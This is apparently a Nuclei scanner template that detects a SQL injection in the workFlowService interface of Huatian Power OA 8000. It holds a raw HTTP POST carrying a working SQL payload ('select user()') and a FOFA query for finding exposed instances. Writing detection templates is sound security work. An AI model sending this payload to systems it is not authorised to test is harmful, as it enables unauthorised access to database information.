2024-03-28 08:52:03 +00:00
id : huatian-oa-sqli
info :
name : Huatian Power OA 8000 - SQL Injection
author : ritikchaddha
severity : high
description : |
There is a SQL injection vulnerability in the workFlowService interface of Huatian Power OA 8000. An attacker can exploit this vulnerability to obtain sensitive database information.
reference :
- https://blog.csdn.net/qq_41617034/article/details/124305120
metadata :
verified : true
fofa-query : app="华天动力-OA8000"
tags : huatian,oa,sqli
http :
- raw :
- |
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host : {{Hostname}}
2024-03-28 08:57:15 +00:00
<buffalo-call>
<method>getDataListForTree</method>
<string>select user()</string>
2024-03-28 08:52:03 +00:00
</buffalo-call>
matchers :
- type : dsl
dsl :
- 'contains_all(body, "<list>" ,"<string>user()" ,"<length>")'
- 'contains(header, "text/xml")'
- 'status_code == 200'
condition : and